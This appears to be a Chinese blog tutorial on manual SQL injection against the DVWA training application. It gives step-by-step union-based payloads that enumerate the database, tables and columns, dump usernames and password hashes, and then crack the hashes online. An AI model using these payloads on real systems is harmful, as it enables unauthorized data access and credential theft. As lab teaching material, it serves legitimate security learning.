DVWA中sql注入详解

本文介绍了手工进行SQL注入的常规思路,从判断注入点开始,包括测试字符型和数字型注入,猜解查询字段数,确定回显位置,接着获取数据库名,表名,字段名,最终读取数据。并通过实例展示了如何在DVWA中执行这些步骤。
摘要由CSDN通过智能技术生成

手工注入常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

一:判断是否存在sql注入,输入1’,返回错误
判断存在sql注入:当输入1’,返回错误,说明页面没有对1’进行过滤,即攻击者可以对数据库进行操作
在这里插入图片描述

输入1,回显正常,确认存在sql注入
二:猜解SQL查询语句中的字段数
输入这个:1’ order by 2#
在这里插入图片描述

输入这个:1’ order by 3#
在这里插入图片描述

三:确定回显位置(为第二个位置)
1’ union select 1,2#
在这里插入图片描述

四:获取当前数据库。dvwa
1’ union select 1,database()#
在这里插入图片描述

五:获取数据库中的表
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述

六:获取表中的字段名
1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users’#
在这里插入图片描述

七:获取字段中的数据
1’ union select user,password from users#
在这里插入图片描述

八:把Surname后面的字符复制以后到https://www.cmd5.com/解密
在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值